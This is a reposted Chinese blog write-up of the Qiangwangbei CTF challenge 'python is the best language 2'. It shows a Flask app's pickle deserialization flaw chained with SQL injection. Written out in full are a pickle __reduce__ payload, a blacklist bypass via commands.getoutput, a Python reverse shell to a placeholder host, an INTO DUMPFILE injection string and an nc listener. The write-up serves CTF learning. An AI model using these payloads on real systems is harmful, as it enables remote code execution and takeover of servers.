博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
复现强网杯python is the best language 2
阅读量:6442 次
发布时间:2019-06-23

本文共 2006 字,大约阅读时间需要 6 分钟。

参考文献:

源码下载下来后,是基于flask框架,先查看路由文件routes.py,里面功能大部分是基于登陆的。

others.py的最后有这样的内容

img_5bd28a6a0932c06334b558cca3b90a3f.png
2.png

load()函数有一个unpkler函数用于反序列化参数(file),如果file可控那么这就是一个反序列化漏洞。

借用下大佬的payload,理解下这个。

用下面的脚本(12.py)进行序列化payload的生成:

import osfrom pickle import Pickler as Pklerimport commandsclass hhh(object):    def __reduce__(self):        return (os.system,("whoami",))evil = hhh()def dump(file):    pkler = Pkler(file)    pkler.dump(evil)with open("test","wb") as f:    dump(f)

测试反序列化漏洞(13.py):

from pickle import Unpickler as Unpklerfrom io import open as Opendef LOAD(file):    unpkler = Unpkler(file)    return Unpkler(file).load()with Open("test","rb") as f:    LOAD(f)

执行会12.py后,会在12.py的同级目录下生成test,执行13.py会显示出用户信息

全局搜索load()函数,发现它在Mycache.pyFileSystemCache类中有多次引用。(代码太长了,贴下有用的)

img_2e0a9ef789b2874044362c0fa3a1d53e.png
2.png
跟入_get_filename方法
img_da6a0660b922c07df972734bcc508fa2.png
2.png
可以看到将传入的字符串key进行MD5,并将其返回。通过全局搜索,发现在Mysession.py的open_session中调用了key
img_be0876b72cbe3947b56ff8665f30ff34.png
2.png
img_8f66228787ac10196d54794153debde9.png
1.png

其中self.key_prefixbdwsessions,因此假设cookie中的sesssion值为pleated,则self.key_prefix + sid即为bdwsessionspleated,然后这串字符串进行MD5得到的结果0ab5423aafb316e9c299e0bb853d0c11。这样就可以控制file了。

攻击流程

①本地生成序列化文件,并且进行十六进制编码
②通过第一关的sql注入,将本地生成的payload,写入服务器上的session文件,指定文件名为MD5(bdwsessionspleated),这样我们在访问/index的时候把cookie中的session值改为pleated,触发open_session中的self.cache.get就可以进行反序列化攻击了

沙箱逃逸

源码还设置了沙箱/黑名单来防止某些函数的执行,比如前面的os.system就被禁用了

img_a63b014f36d34f5e597ec4b486c816ee.png
2.png
此处过滤了大多数函数,但是
commands.getoutput和subprocess.Popen()并没有过滤,payload用的是
commands.getoutput

import cPickleimport commandsclass Exp(object):    def __reduce__(self):        return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) e = Exp()poc = cPickle.dumps(e)print  '0x'+poc.encode('hex')

在注册的邮箱处填入:

test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com

注册后出现Please use a different email address.。说明写入成功

然后访问
抓包修改session值为pleated

反弹shell

nc -l -p 8181 -vvv

查看flag即可。

转载地址:http://kmkwo.baihongyu.com/

你可能感兴趣的文章
iOS 内存管理
查看>>
JOBDU 1193 矩阵转置
查看>>
GoldenGate 日常监控
查看>>
数书九章 内容
查看>>
node.js中的字符串、对象和json处理函数
查看>>
关于c++风格 code style
查看>>
checkbox单选
查看>>
js中的json
查看>>
个人项目博客----移山小分队----05
查看>>
yield 关键字和迭代器
查看>>
python变量命名规则
查看>>
分类游戏 结构体
查看>>
发送邮件方法
查看>>
Oracle数据库优化器的优化方式
查看>>
rabbitmq
查看>>
不谈技术~蛇年,我回来了!
查看>>
leetcode Balanced Binary Tree
查看>>
LINUX系统日志的清除
查看>>
学习进度14
查看>>
LoadRunner中将中文转换为URL编码类型的方法
查看>>